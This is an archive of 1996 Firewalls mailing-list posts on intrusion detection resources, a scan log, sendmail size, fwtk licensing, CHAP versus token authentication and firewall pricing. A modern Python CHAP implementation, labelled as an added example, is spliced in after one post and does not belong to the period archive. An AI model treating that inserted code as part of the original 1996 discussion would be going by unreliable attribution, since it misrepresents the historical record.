Ian J-B ========================================= Ian Johnstone-Bryden, Rayzarb Associates Tel: +44 (0)1986 782418 Fax: +44 (0)1986 782525 Email: gq50@dial.pipex.com +++++++++++++++++++++++++++++++++++++++++ Latest book by Ian Johnstone-Bryden "Managing Risk", Avebury Imprint ISBN 1 85972 255 5 Library of Congress CICs No. 95-79002 ========================================= From firewalls-owner Fri Feb 2 14:25:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16865 for firewalls-outgoing; Fri, 2 Feb 1996 12:48:12 -0800 (PST) Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA20793 for ; Thu, 1 Feb 1996 08:50:02 -0800 (PST) Received: from vodka.sse.att.com (vodka.gc.att.com) by ig4.att.att.com id AA04337; Thu, 1 Feb 96 11:41:46 EST Message-Id: <9602011641.AA04337@ig4.att.att.com> From: mdr@vodka.sse.att.com Subject: Intrusion Detection References for all To: firewalls@greatcircle.com Date: Thu, 1 Feb 1996 11:48:28 -0500 (EST) X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Since I received so many requests for the results of my query I decided to reply to the general list. My future posting about this subject will be done to ids@uow.edu.au where I should have originally posted. I deleted a few responses that were personal invitations from individuals because I thought that it would be inappropriate to post those to the list. Many Thanks again to those who responded. Mark Riggins Secure Systems Engineering AT&T Bell Labs ==================================================================== Hi, > On Mon, 22 Jan 1996, Fred Cohen wrote: > I do know DIDS. It is not a commercial product and is not generally > available. 
It does an admirable job, but it is resource intensive (cpu > cycles, disk space, and operator and analyst time). Even if it were > available, it would not be a solution for very many sites. How does one obtain it? > However, Phillipe Langlois > mentioned one developed in France. Perhaps he could summarize this > product for our edification?? IDERS is a product (under permanent improvement) which collects data from numerous probes at various subsystems (network, file system, process use, commands, data contained in files...). The probes report data to a central program which tries to make clear and understandable reports. It tries to detect fuzzy attacks which are not often detected with normal tools. IDERS is a commercial _service_, it's not sold but installed for our clients as a tool for our security service. PhiL. -- Philippe Langlois INTRINsec - Securite informatique Philippe.Langlois@INTRINsec.com - http://www.INTRINsec.com ==================================================================== From: "Lisa M. Jaworski" Content-Type: text Content-Length: 339 Status: RO Mark, I just received info from SAIC regarding its intrusion detection product. It's called CMDS (Computer Misuse Detection System) & the POC is Paul Proctor (proctor@mls.saic.com). The marketing literature comes with a slew of paperwork, including a paper on audit reduction & misuse detection in heterogeneous environments. Lisa J. ==================================================================== From: Mark_W_Loveless@smtp.bnr.com Message-Id: <9600298229.AA822944324@smtp.bnr.com> To: mark.riggins@att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 1229 Status: RO Try the alt.2600 FAQ via anon ftp at rtfm.mit.edu /pub/usenet-by-group/alt.2600 There is a fairly complete list of hacker hangouts, security newsgroups, mailing lists, and a ton of web links (assuming the latest version is out there, it was recently updated in the last couple of months). 
Bear in mind it is written from the perspective of the guys you want to keep out of your system. ==================================================================== From: Alan Dowd To: mark.riggins@att.com Subject: Re: intrusion detection In-Reply-To: <9601252031.AA04494@ig1.att.att.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Length: 1391 Status: RO Greetings, Mark! The obvious, obvious is Fred Cohen's web site. One may not like the way he posts, but he does do a lot of consulting work on intrusion detection/prevention. I don't have his URL handy, but he writes to Best of Security and posts the URL in his sig block. Other obvious, obvious is NCSA - the security folk at www.ncsa.com, not the super-computer folk. There is a list of maillists at http://www.iss.net/iss/maillist.html - Intruder Detection is described there. Good Luck, -- Alan Dowd Phone: +1 612 628 1641 Secure Computing Corporation FAX: +1 612 628 2701 2675 Long Lake Road URL: http://www.sctc.com Roseville, MN 55113-2536 E-Mail: dowd@sctc.com -- ==================================================================== From: "Lisa M. Jaworski" Content-Type: text Content-Length: 319 Status: RO Mark, Are you familiar with the work that Teresa Lunt was doing when she was at SRI? She is now a Program Mgr at ARPA (try lunt@arpa.gov but I'm not sure if that's right.) Also, Christopher Klaus cklaus@iss.net. SAIC has a product out now, too. Check out their web pages for more info & a POC. Take care, Lisa J. ==================================================================== From: Torsten Sturm Organization: CSD, Univ. 
Erlangen-Nuernberg, Germany X-Mailer: Mozilla 2.0b5 (X11; I; SunOS 4.1.3 sun4m) Mime-Version: 1.0 To: mark.riggins@att.com Original-Cc: firewalls@greatcircle.com Subject: Re: intrusion detection References: <9601252031.AA04494@ig1.att.att.com> Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Content-Type: text/plain; charset=us-ascii Content-Length: 1034 Status: RO The COAST Projects are somewhat dedicated to various flavours of intrusion detection and are always a good starting point ! http://www.cs.purdue.edu/coast/coast-tools.html HTH, Torsten -- InfoSec webpage : http://www.rrze.uni-erlangen.de/~unrzg3/security/security.html __________________________________________________________________ http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html 
==================================================================== From: Darren Reed Subject: Re: intrusion detection To: mdr@vodka.sse.att.com Date: Mon, 29 Jan 1996 21:19:39 +1100 (EDT) In-Reply-To: <9601261408.AA24513@ig2.att.att.com> from "mdr@vodka.sse.att.com" at Jan 26, 96 09:09:02 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1042 Status: RO In some mail from mdr@vodka.sse.att.com, sie said: > > Do you have reach info for Omniguard? not handy, but will see what I can do. > > Omniguard distribute a suite of programs on a single CD-ROM, one of which > > is supposedly an intrusion detection program. I say supposedly because > > I've not had a valid license key to do anything useful with it. > > > > darren > > ==================================================================== From: Jordan Hayes Message-Id: <199601262322.PAA25215@Thinkbank.COM> To: mdr@vodka.sse.att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 356 Status: RO From: mdr@vodka.sse.att.com Subject: Re: intrusion detection To: jordan@thinkbank.com (Jordan Hayes) Do you have a reach number or email address or something to help me reach them? > > There's a group at UC Davis doing this. Jeremy Frank is one of the > people involved. > > /jordan > Try Jeremy Frank ... 
/jordan ==================================================================== From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Message-Id: <199601262115.QAA17839@bwface.bwh.harvard.edu> Subject: Re: intrusion detection To: mark.riggins@att.com Date: Fri, 26 Jan 1996 16:15:09 -0500 (EST) In-Reply-To: <9601252031.AA04494@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Jan 25, 96 03:34:09 pm X-Pgp: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Content-Length: 745 Status: RO Some of Spaf's students at COAST have papers. Adam ==================================================================== From: gilsinn@cam.nist.gov (Judith F Gilsinn) Message-Id: <9601261446.AA00755@trumpet.cam.nist.gov> To: mdr@vodka.sse.att.com Subject: Intrusion detection mailing list Content-Type: text Content-Length: 281 Status: RO I have a year old reference to an intrusion detection mailing list. Send mail to majordomo@uow.edu.au with subscribe ids in the message body. Since I don't subscribe to this list, I don't know its status, but you might want to try it. Judy Gilsinn NIST Computer Security Officer ==================================================================== From: "Steve Lodin" Message-Id: <9601260941.ZM29056@narnia.cs.purdue.edu> Date: Fri, 26 Jan 1996 09:41:24 -0500 In-Reply-To: Darren Reed "Re: intrusion detection" (Jan 26, 4:41pm) References: <199601260541.VAA07236@miles.greatcircle.com> On Jan 26, 4:41pm, Darren Reed wrote: > > Omniguard distribute a suite of programs on a single CD-ROM, one of which > is supposedly an intrusion detection program. I say supposedly because > I've not had a valid license key to do anything useful with it. > If you are talking about the Axent Omniguard suite of tools, there is a product called Intruder Alert (ITA). 
I just installed a temporary license for the COAST lab the other day. It looks like a simple syslog watcher from my limited experience with it. Steve -- Steve Lodin Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin Delco Electronics - swlodin@delcoelect.com (317)451-0479 Home - swlodin@iquest.net http://www.iquest.net/~swlodin/ ==================================================================== From: stevenf@goodnet.com (Steven Fullmer) Subject: Re: intrusion detection Content-Type: text/plain; charset="us-ascii" Content-Length: 780 Status: RO CommerceNet at http://www.commerce.net has an electronic jump station. Go to the "security" section and use it as a jumping off point. **was a good start when I wrote the page 5 months ago???*** ========================================================================= From: K.T.Khoo@iti.salford.ac.uk Date: 26 Jan 96 13:55 Hi, I am a PhD student working on IT security, esp. on PKI, although my interest is on intrusion detection . . . . You may find quite some good papers on the said topic, esp. 'An Application of Pattern Matching in Intrusion Detection' from: http://www.cs.purdue.edu//coast/coast-library.html Do keep in touch. Cheers! Vincent Khoo ==================================================================== From: Darren Reed Subject: Re: intrusion detection Omniguard distribute a suite of programs on a single CD-ROM, one of which is supposedly an intrusion detection program. I say supposedly because I've not had a valid license key to do anything useful with it. darren ==================================================================== From: Ron DuFresne To: mdr@vodka.sse.att.com Mark, You prolly have already done so, but you can do a web search on 'mitnick' and come up with tons of info, don't expect much from yahoo, but lycos will keep you busy for a full day at least. And not all the info is mitnick oriented. 
Also, you may wish to exchange some private mails with Ray Kaplan from the list here, he has some very good insights as to this perspective. By the same token, I would be interested in seeing the 'workbench' you are able to piece together. Thanks, my best to you and yours, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ==================================================================== From: garland@gatekeeper.cb.att.com To: mark.riggins@att.com Hi Mark, Intrusion detection... here are a few quick notes. These are all public domain. more details available upon request, including URLs. sorry for the terse message. I am on a rather convoluted link, that includes dialup from a hotel, ppp, an Internet connection, and a GUARD connection into AT&T. COPS by Dan Farmer is a reasonable system scanner. tiger is another similar tool. tripwire, with md5, and binaudit scan for changes to the file system. swatch is a tool that analyzes log files. There are a few other tools that scan a system from the outside. They are basically portscanners, with some intelligence built in. ISS, nfsbug, SATAN are examples. Chris ==================================================================== From: swlodin@cs.purdue.edu (Steve Lodin) Message-Id: <199601260243.VAA27520@narnia.cs.purdue.edu> Subject: Re: intrusion detection This may be obvious, but have you checked the COAST Archive? I know we have about 5 IDS papers there. Check the COAST Web page also (http://www.cs.purdue.edu/coast) because the group is working on a project called IDIOT (Intrusion Detection In Our Time). Alternatively, there has been much IDS research at UC Davis. 
Steve -- Steve Lodin Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin Delco Electronics - swlodin@delcoelect.com (317)451-0479 Home - swlodin@iquest.net http://www.iquest.net/~swlodin/ ==================================================================== From: Jordan Hayes Message-Id: <199601260153.RAA15092@Thinkbank.COM> To: mdr@vodka.sse.att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 94 Status: RO There's a group at UC Davis doing this. Jeremy Frank is one of the people involved. /jordan ==================================================================== Have you tried looking at the ids list? ids@uow.edu.au (use the -request form to subscribe). Ben. ____ Ben Samman..............................................samman@cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman@powered.cs.yale.edu for key Want to give a soon-to-be college grad a job? Mail me for a resume ==================================================================== From: Jim Cannady Subject: Re: Network Intrusions Content-Type: text/plain; charset="us-ascii" Content-Length: 2022 Status: RO Hi Mark, Yeah, I got more reference material than my desk can stand at the moment!! I've been collecting this stuff for the past couple of years, and I'm sure that I've got close to everything that's been published on the topic in a refereed journal. Let me know your specifics and I'll see what I can find. 
Jim >> ================================== >> James Cannady | >> Research Scientist | >> Georgia Institute of Technology | >> GTRI/ITL/CSITD | >> James.Cannady@gtri.gatech.edu | >> (404) 894-9730 | >> ================================== ==================================================================== From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9511292047.AA10059@hosaka.smallworks.com> To: cibir@netcom.com Subject: Re: Intruder & Analysis Software Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Content-Type: text Content-Length: 47 Status: RO 'Stalker' from Haystack Labs, in Austin, TX From firewalls-owner Fri Feb 2 14:40:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA19393 for firewalls-outgoing; Fri, 2 Feb 1996 13:51:47 -0800 (PST) Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA19358 for ; Fri, 2 Feb 1996 13:51:11 -0800 (PST) Received: from qmgate.mitre.org (qmgate.mitre.org [129.83.100.120]) by mbunix.mitre.org (8.6.10/8.6.9) with SMTP id QAA20413 for ; Fri, 2 Feb 1996 16:49:51 -0500 Message-ID: Date: 2 Feb 1996 16:46:33 -0500 From: "Dan Vukelich" Subject: Survey To: "Firewalls Great Circle" X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Time:4:48 PM OFFICE MEMO Survey Date:2/2/96 I'm new to the firewalls list, so please bear with me. First, what I'm looking for is an independent study of firewall products, with columns such as "provides packet filtering," "supports IPX," etc. Second, several years back, a government or educational site was (ab)used as an FTP dumping ground for such things as pornography and bootlegged software; does anyone recall this or have any information they can pass on to me? 
Danny From firewalls-owner Fri Feb 2 14:55:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA19878 for firewalls-outgoing; Fri, 2 Feb 1996 14:11:59 -0800 (PST) Received: from uucp-1.csn.net (uucp-1.csn.net [199.117.27.26]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA19854 for ; Fri, 2 Feb 1996 14:11:11 -0800 (PST) Received: from bacchus.UUCP (uucp@localhost) by uucp-1.csn.net (8.6.12/8.6.12) with UUCP id PAA24532 for greatcircle.com!Firewalls; Fri, 2 Feb 1996 15:09:05 -0700 From: Shawn Steele Message-Id: <9602021504.ZM20514@aob.org> Date: Fri, 2 Feb 1996 15:04:47 -0700 In-Reply-To: firewalls-digest-owner@greatcircle.com "Firewalls-Digest V5 #78" (Feb 1, 2:00pm) References: <199602012200.OAA02128@miles.greatcircle.com> X-Mailer: Z-Mail Lite (3.2.0 26may94) To: Firewalls@greatcircle.com Subject: Re: Scanning from afar... Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone seen this type of network scanning before? Addresses have > been changed to protect the innocent and the guilty. > > Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp > X.X.143.14(39620) -> X.X.211.227(80), 1 packet Maybe it's a webbot gone mad that wants to index the web REALLY thoroughly. I wonder why they're only checking every 16th machine? - shawn Shawn Steele Webmaster Information Systems Administrator Association of Brewers (303) 447-0816 x 118 (voice) 736 Pearl Street (303) 447-2825 (fax) PO Box 1679 shawn@aob.org (e-mail) Boulder, CO 80306-1679 info@aob.org (aob info) U.S.A. http://www.aob.org/aob (web) Note: When replying to my messages, please include enough of my message so that I know what you're replying to! 
:-) From firewalls-owner Fri Feb 2 15:53:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA24491 for firewalls-outgoing; Fri, 2 Feb 1996 15:31:36 -0800 (PST) Received: from [198.102.244.97] (pb520-ppp.greatcircle.com [198.102.244.97]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA24465; Fri, 2 Feb 1996 15:31:26 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 2 Feb 1996 18:31:47 +0100 To: Ray Hooker , "'Firewall Mailing List'" From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Does SMTP allow security breaches. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:14 PM 1/31/96, Ray Hooker wrote: >The best way to answer the question about SENDMAIL is to simply point to >the fact that the program is like 6000 lines long and has a long history of >problems. I _wish_ it was only 6000 lines long... Try more like 30,000, last I checked... I don't know if it's gotten longer or shorter lately. -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! 
From firewalls-owner Fri Feb 2 16:24:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA28094 for firewalls-outgoing; Fri, 2 Feb 1996 16:11:26 -0800 (PST) Received: from wicked.neato.org (wicked.neato.org [198.70.96.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA28076 for ; Fri, 2 Feb 1996 16:11:16 -0800 (PST) Received: (from george@localhost) by wicked.neato.org (8.7.2/8.6.12) id QAA07610; Fri, 2 Feb 1996 16:11:28 -0800 (PST) Date: Fri, 2 Feb 1996 16:11:28 -0800 (PST) Message-Id: <199602030011.QAA07610@wicked.neato.org> From: George Mullins To: mjr@v-one.com cc: firewalls@greatcircle.com Subject: Re: SSL and S-HTTP Proxy Status (as of 11 January 1996) In-Reply-To: <199601300002.TAA21978@clark.net> References: <199601291747.MAA02785@argon.ncsc.mil> <199601300002.TAA21978@clark.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus J. Ranum writes: > David P. Kemp > > >So, I sympathize with the sentiment that TIS should either put some > >effort into maintaining fwtk, or release it so that a net-fwtk could > >be maintained by the user community. > > Wait a minute -- are you asking TIS to keep spending money > to keep giving you free firewalls? > No I don't think that is what he is asking. I think that David was saying that if TIS isn't planning on doing anything further with the toolkit then why don't they release the code into the public domain or copy-left and let the community support it - after all it was (at least partly) developed under a DARPA contract at TAX PAYERS expense and should therefore belong to the TAX PAYERS and not TIS. > I just want to make sure that's what you're asking. Because > I have been thinking of moving to a big house in the countryside, > with space for a darkroom, and I think it's only fair that you help > chip in on my mortgage. Because it would be ever so convenient for > me not to have to pay it myself. I just want to make sure what you're saying. 
TIS built this nice big house in the country with space for a nice office where they could do business and the government paid them to build the house and now they decide who will use the house and how. While it seemed awfully magnanimous that TIS was giving away the toolkit, it seems that under the DARPA contract they had to give it away - not because they were just nice guys - and at the same time they could restrict use of the code to non-competitive/non-commercial products. Seems like a pretty good deal that TIS got given by DARPA. -george From firewalls-owner Fri Feb 2 16:38:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA28009 for firewalls-outgoing; Fri, 2 Feb 1996 16:10:24 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA27988 for ; Fri, 2 Feb 1996 16:10:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id PAA16376; Fri, 2 Feb 1996 15:36:35 -0800 Date: Fri, 2 Feb 1996 15:36:32 -0800 (PST) From: Bob Bosen Subject: Re: CHAP Authentication To: nicholscs@agedwards.com cc: firewalls@greatcircle.com In-Reply-To: <1996Feb02.132500.1093.27907@igate.agedwards.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 2 Feb 1996 nicholscs@agedwards.com wrote: > > This is a general security related question relating to incoming > communications into a router. Specifically a remote user dialing into a > router attached to an applications server. > > I have to make an argument comparing/contrasting the security levels between > CHAP authentication and Token Authentication. The argument has been > successfully made that Token authentication is generally considered to > provide superior authentication. From a management viewpoint the question > becomes - CHAP is basically free (manhours and implementation) vs. 
Token > which can be expensive - therefore tell us why CHAP is inferior to Tokens > for perimeter security? > > What threats does CHAP pose? Has CHAP been successfully penetrated? By > what methods? > > I have read the RFC's on PPP and Authentication but am still unable to apply > this to a real world threat. > > Thanks, > > Chris > nicholscs@agedwards.com > > > > > Chap is usually implemented to provide "node" authentication. It gives a reliable indication of the node from which an access request originates (or the nearest link in some cases. ) You can generally determine whether chap goes beyond node authentication by asking yourself this question: "Does the authorized user get personally involved in this CHAP signon (by entering a PIN or somesuch) every time access is requested?" If the answer to that question is "no", then your CHAP implementation is probably being performed automatically by the routers or commserver equipment involved at both ends of the links being authenticated. This is the usual and conventional way that CHAP has come to be used. "Token-based" authentication is generally much more personal. The individual user is directly involved in operating the authenticator and usually has to enter a PIN or at least an additional password, every time. You know he's there, alive and thinking. It's less convenient, but more secure. Now let's look at a typical scenario: Suppose your Commserver implements CHAP authentication transparently and you allow your employees to telecommute into your LAN. Now suppose one or more of your employees has teenaged kids that know how to operate a computer. When your router authenticates your employee's computer in his home, it can't tell whether it's your employee or his teenaged sibling knocking on the door. Now suppose your employee has a LAN in his home. How good is that security? Does his LAN reach out to other LANs? Can his modem slip or ppp out to a commercial Internet provider? 
Have you just joined your corporate network with the entire world? With the usual transparent CHAP implementations, you should probably be worrying about all of the above. With token-based authentication, you can reasonably tell your employee that every time a session begins between your corporate LAN and his PC (or home LAN), you know he will be personally present, and you can hold him personally responsible for the reasonable activities he is expected to perform, until he takes the link down. If he also uses that token when at the office, you can be reasonably sure he'll keep it with him wherever he goes. That will deny access to your LAN from his kids or from whoever can hop through his PC while he's not there. That's the way I see it (and I'm biased!) Regards, Bob Bosen Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA Tel: +1 510 827-5707 Internet: bbosen@netcom.com http://www.safeword.com ftp://ftp.safeword.com/download/ ************************************************************************** * "It wasn't me!!! Somebody must have captured my username/password!!!" 
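As an added example (not from Bob Bosen's post, nor from Enigma Logic or any router vendor), here is the RFC 1994 CHAP exchange in Python: the peer's Response is computed from a secret stored in its configuration, so every session from that machine authenticates identically whether or not the authorised user is at the keyboard. Peer names and secrets are constructed for the example.

```python
"""Added example, not from the original post: a minimal RFC 1994 CHAP
exchange (MD5 algorithm) between a dial-in peer and a commserver.
Peer names and secrets are constructed for the example."""
from __future__ import annotations

import hashlib
import hmac
import os
from typing import Callable

# CHAP packet codes, RFC 1994 section 4
CHAP_CHALLENGE = 1
CHAP_RESPONSE = 2
CHAP_SUCCESS = 3
CHAP_FAILURE = 4


def chap_md5_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 section 4.1: the Response Value is MD5 over
    Identifier (one octet) || shared secret || Challenge Value."""
    return hashlib.md5(bytes([identifier & 0xFF]) + secret + challenge).digest()


class Peer:
    """The box at the far end of the link (home PC or router).

    The secret is read from its configuration (the equivalent of a
    chap-secrets file), so the reply is produced with no human input:
    whoever is sitting at the machine, or routing through it, gets the
    same answer. That is what makes this *node* authentication."""

    def __init__(self, name: str, secret: bytes) -> None:
        self.name = name
        self.secret = secret

    def answer(self, identifier: int, challenge: bytes) -> tuple[int, bytes, str]:
        """Build the Response packet fields: Identifier, Value, Name."""
        return identifier, chap_md5_response(identifier, self.secret, challenge), self.name


class Authenticator:
    """The commserver. Holds one shared secret per peer name and keeps
    an audit trail of every outcome."""

    def __init__(self, secrets: dict[str, bytes],
                 rng: Callable[[int], bytes] = os.urandom) -> None:
        self.secrets = dict(secrets)
        self._rng = rng
        self._pending: dict[int, bytes] = {}   # Identifier -> Challenge Value
        self._next_id = 0
        self.audit: list[str] = []

    def challenge(self) -> tuple[int, bytes]:
        """Send a Challenge: fresh random value under a new Identifier."""
        ident = self._next_id
        self._next_id = (self._next_id + 1) % 256
        value = self._rng(16)
        self._pending[ident] = value
        return ident, value

    def check(self, identifier: int, response: bytes, name: str) -> int:
        """Verify a Response and return CHAP_SUCCESS or CHAP_FAILURE.

        Each challenge is consumed on first use, so a captured Response
        cannot be replayed; but nothing here proves a person is present."""
        value = self._pending.pop(identifier, None)
        secret = self.secrets.get(name)
        ok = (
            value is not None
            and secret is not None
            and hmac.compare_digest(response, chap_md5_response(identifier, secret, value))
        )
        self.audit.append(f"id={identifier} name={name} {'SUCCESS' if ok else 'FAILURE'}")
        return CHAP_SUCCESS if ok else CHAP_FAILURE


def dial_in(auth: Authenticator, peer: Peer) -> int:
    """One complete exchange: Challenge -> Response -> Success/Failure."""
    ident, value = auth.challenge()
    return auth.check(*peer.answer(ident, value))


if __name__ == "__main__":
    commserver = Authenticator({"alice-home-pc": b"configured-secret"})
    home_pc = Peer("alice-home-pc", b"configured-secret")
    # Two sessions in a row succeed identically: nobody typed a PIN.
    print(dial_in(commserver, home_pc) == CHAP_SUCCESS)
    print(dial_in(commserver, home_pc) == CHAP_SUCCESS)
    # A box with the wrong secret is refused, and the audit trail records it.
    print(dial_in(commserver, Peer("alice-home-pc", b"guess")) == CHAP_FAILURE)
    for line in commserver.audit:
        print(line)
```

The audit trail names the peer, never a person; that is the gap the token-based scheme in the post is meant to close.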
* ************************************************************************** From firewalls-owner Fri Feb 2 17:38:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA02868 for firewalls-outgoing; Fri, 2 Feb 1996 17:30:15 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA02854; Fri, 2 Feb 1996 17:30:10 -0800 (PST) Received: by gauntlet-1.trusted.com; id UAA25021; Fri, 2 Feb 1996 20:35:46 -0500 Received: from hilo.trusted.com(10.0.1.126) by gauntlet-1.trusted.com via smap (V3.1) id xma025017; Fri, 2 Feb 96 20:35:26 -0500 Received: from localhost by hilo.trusted.com with SMTP (1.37.109.4/16.2) id AA17428; Fri, 2 Feb 96 20:28:20 -0500 Message-Id: <9602030128.AA17428@hilo.trusted.com> To: Brent@greatcircle.com (Brent Chapman) Cc: firewalls@greatcircle.com Subject: Re: Does SMTP allow security breaches. In-Reply-To: Your message of "Fri, 02 Feb 1996 18:31:47 EST." Date: Fri, 02 Feb 1996 20:27:55 EST From: "Rick Murphy" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I _wish_ it was only 6000 lines long... Try more like 30,000, last I >checked... I don't know if it's gotten longer or shorter lately. Sendmail 8.7.1 is over 40,000 lines. 
:-( -Rick From firewalls-owner Sat Feb 3 05:08:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA22937 for firewalls-outgoing; Sat, 3 Feb 1996 04:57:06 -0800 (PST) Received: from vent.pipex.net (vent.pipex.net [158.43.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA22930 for ; Sat, 3 Feb 1996 04:57:01 -0800 (PST) Received: from unknown by vent.pipex.net (8.6.12/PIPEX simple 1.20) id MAA02320; Sat, 3 Feb 1996 12:55:56 GMT Message-ID: In-Reply-To: <9602021310.AA16539@london.csd.harris.com> References: Conversation with last message <9602021310.AA16539@london.csd.harris.com> To: Firewall List MIME-Version: 1.0 From: Ian Johnstone-Bryden Subject: Re: Most Secure Unix? Date: Sat, 03 Feb 96 13:02:59 GMT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yesterday, someone sent an email intended for me but addressed to the list by accident. This prompted a technician from a Harris overseas subsidiary to post a response back to the list. I sent appropriate email to both parties privately and would have left it there but, on reflection, the incident does have some lessons which may be of general interest to the list. The person intending to email me used a mail package at a site he was visiting, rather than waiting to use the trusted system he is familiar with. It looks like a bug in the mail application reselected the 'firewalls' address from a posting extract I had fwd but equally it could have been a human mistake. That is being looked at because the site owner has had other incidents where mail has been re-addressed before leaving his site. The site from which the email came has a typical firewall. The first lesson may therefore be that some fairly common problems cannot be caught by the firewall but could result in significant damage to the enterprise. 
Hostile attack from the outside is only one risk facing email users and, although it can be very damaging, is a very low probability against other risks. The other lesson may be from the Harris response. Making a reply to a fragment of a larger discussion can result in an out of context response. The implication of the Harris response is that Nighthawk with CyberGuard is really only going to cost a few thousand dollars. In the context of the wider discussion, Nighthawk with CyberGuard, and a number of other products were compared functionally and financially against a specific requirement and a better solution was achieved at considerably lower cost. As was pointed out in the accidental posting, these products were good products, just over priced for the particular requirement. Price was not, however, the only criterion and was in this particular case of secondary importance. A refreshing change to see a user identifying his potential problems, producing a functional requirement, and then selecting the most appropriate solutions before moving to a financial analysis of each proposal which met the functional specification - that may be a lesson in its own right. The fact that Nighthawk/Cyberguard, or any other product, was under specification and over priced in one situation doesn't mean that it can't be the best value in another, but you need to understand the relative specifications to know that. Harris suffers a set of problems which are not unique. Their computer systems operation has a tradition of producing highly specified hardware for aerospace and defence applications, particularly real-time OS and Ada niches. That has two commercial impacts. Firstly the niche markets traditionally have been very small and very specialised. Secondly, the niche markets have also been very demanding and this has required very heavy R&D costs and additional production costs. The resulting product is very good if your requirement is similar to the target niche market requirements. 
Inevitably it results in a significant increase in retail unit cost. If your requirement is for a system which you can mount in a military aircraft and fly through a radiation/EMP zone, buying a specialised product designed for this is actually much cheaper than buying a stack of Intel boxes. If a vendor is producing software independent of hardware, it really doesn't matter, because those users who require an armour-plated multi-processor machine can find a suitable platform, and those who can meet their requirements with a commodity-priced PC clone can also find a suitable platform (or any point between the two extremes), in both cases mounting the same software. Obviously a company such as Harris is at a disadvantage because the primary reason to market is to sell hardware, and the hardware may not offer best value in a specific requirement set. IMHO such a vendor has two options. One is to concentrate on those niches where the hardware specification makes their hardware good value for money. The other is to concentrate on building platform-independent software. There is no margin in trying to market a product which is overpriced as a result of being over-specified in particular markets.

Ian J-B

> > Ian:
> >
> > well they are good products. The problem is that the systems are just
> > TCP/IP firewalls and cost an arm and a leg. Most of the night hawks
> > come in for around 100K.
> >
